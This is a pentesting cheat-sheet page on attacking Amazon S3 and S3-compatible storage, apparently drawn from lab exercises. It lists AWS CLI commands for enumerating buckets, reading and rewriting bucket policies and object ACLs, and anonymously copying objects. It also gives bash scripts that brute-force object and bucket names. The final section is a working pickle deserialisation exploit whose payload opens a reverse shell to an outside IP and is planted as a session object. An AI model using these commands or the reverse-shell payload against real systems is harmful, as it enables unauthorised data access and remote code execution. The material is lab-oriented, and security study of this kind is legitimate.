Skip to content

S3

Description

Amazon S3 or Amazon Simple Storage Service is a service offered by Amazon Web Services that provides object storage through a web service interface. Amazon S3 uses the same scalable storage infrastructure that Amazon.com uses to run its e-commerce network.

Usage

bucket-name.s3-website-.amazonaws.com

Enumeration

aws --endpoint http://192.50.19.3:9000 s3api list-buckets
aws --endpoint http://192.50.19.3:9000 s3 ls s3://hello-world
aws --endpoint http://192.50.19.3:9000 s3 cp s3://hello-world/flag ./
aws --endpoint http://192.50.19.3:9000 s3 cp ./hello s3://hello-world/hello
aws --endpoint http://192.50.19.3:9000 s3api get-bucket-policy --bucket welcome
aws --endpoint http://192.50.19.3:9000 s3api put-bucket-policy --policy file:///root/policy.json --bucket welcome
aws --endpoint http://192.50.19.3:9000 s3 rm s3://hello-world/welcome

aws s3api list-buckets
aws s3api list-objects --bucket <bucket-name>
aws s3api get-bucket-policy --bucket <bucket-name> --output text | python3 -m json.tool # Check ressource if filename leak or if Condition exists
aws s3api put-bucket-policy --bucket <bucket-name> --policy file://policy.json # Same policy file but pass "Effect" to "Allow"

aws s3api get-object-acl --bucket <bucekt-name> --key flag > objacl.json # Check Permission (FULL_CONTROL)
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json

aws s3 --no-sign-request --region ap-southeast-1 ls s3://lab-webapp-static-resources
aws s3 --no-sign-request --region ap-southeast-1 ls s3://lab-webapp-static-resources/scripts
aws s3 --no-sign-request --region ap-southeast-1 cp s3://lab-webapp-static-resources/scripts/backup.sh ./

Brute-Force Objects Name

#!/bin/bash
while read F ; do
  count=$(curl $1/public/$F -s | grep "The specified key does not exist." |wc -l)
  if [[ $count -eq 0 ]]
  then
    echo "Object Found: "$F
  fi
done < $2
./find.sh 192.137.54.3:9000 /usr/share/dirb/wordlists/small.txt

aws --endpoint http://192.137.54.3:9000 --no-sign-request s3 cp s3://public/index ./

Brute-Force Bucket Name

#!/bin/bash
while read F ; do
  count=$(curl $1/$F -s | grep -E "NoSuchBucket|InvalidBucketName" |wc -l)
  if [[ $count -eq 0 ]]
  then
    echo "Bucket Found: "$F
   fi
done < $2
./find.sh 192.17.236.3:9000 /usr/share/dirb/wordlists/small.txt

Read s3 sessions objects

import boto3
from botocore import UNSIGNED
from botocore.config import Config
import pickle

s3 = boto3.client('s3', endpoint_url='http://s3.pentesteracademylab.appspot.com',config=Config(signature_version=UNSIGNED))
object = s3.get_object(Bucket='assets',Key='sessions/43085237187070924862845585858148322582')
data = object['Body'].read()
print(pickle.loads(data))

Deserialisation Attack using Pickle to sessions objects

import pickle
import subprocess
import os
import boto3
from botocore import UNSIGNED from botocore.config import Config

class Shell(object):
  def __reduce__(self):
  return (os.system,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.162.63.2\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&",))

s3 = boto3.client('s3', endpoint_url='http://s3.pentesteracademylab.appspot.com',config=Config(signature_version=UNSIGNED))
pickledData = pickle.dumps(Shell())
s3.put_object(Bucket='assets',Key='sessions/43085237187070924862845585858148322582',Body=pickledData)

Resources